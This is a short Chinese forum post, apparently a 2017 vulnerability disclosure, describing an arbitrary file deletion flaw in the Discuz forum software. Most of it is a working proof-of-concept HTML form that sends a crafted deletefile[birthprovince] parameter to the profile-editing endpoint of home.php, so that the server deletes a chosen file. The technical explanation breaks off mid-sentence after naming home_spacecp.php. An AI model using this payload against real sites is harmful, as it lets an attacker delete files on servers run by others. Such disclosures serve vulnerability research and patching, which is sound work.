-
-
[原创]dz前台可任意删除文件漏洞
-
发表于:
2017-10-10 20:13
6124
-
前提条件:
在根路径下创建favicon.ico此文件进行测试
post页面内容:
<html>
<form action="https://*/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"
enctype="multipart/form-data">
<input type="file"
name="birthprovince" id="file" />
<input type="text"
name="profilesubmit"value="1"/></p>
<input type="submit"
value="Submit" />
</form>
</html>
在上传时,调用home_spacecp.php,通过home_spacecp.php调用了
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
